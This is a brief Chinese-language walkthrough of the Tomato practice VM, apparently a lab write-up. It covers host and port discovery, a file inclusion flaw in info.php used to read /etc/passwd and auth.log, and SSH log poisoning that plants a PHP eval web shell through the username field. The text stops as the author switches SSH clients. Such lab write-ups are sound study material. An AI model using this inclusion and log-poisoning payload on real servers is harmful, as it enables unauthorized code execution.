Tomato靶机攻略
将tomato改为NAT模式
主机ip
arp-scan -l
扫描端口,发现ssh服务端口从22改为2211
扫描目录
发现http://192.168.31.134/antibot_image/ 访问
查看所有php文件的源码,看看有什么不同的地方
在info.php的源码中发现问题
在输入后,成功显示,说明文件包含漏洞
info.php?image=/etc/passwd
通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志
info.php?image=/var/log/auth.log
使用ssh登录,看日志里会不会出现记录
发现日志中有记录
使用kali,让一句话木马写入日志中
ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,
我的kali写入失败,选择用xshell连接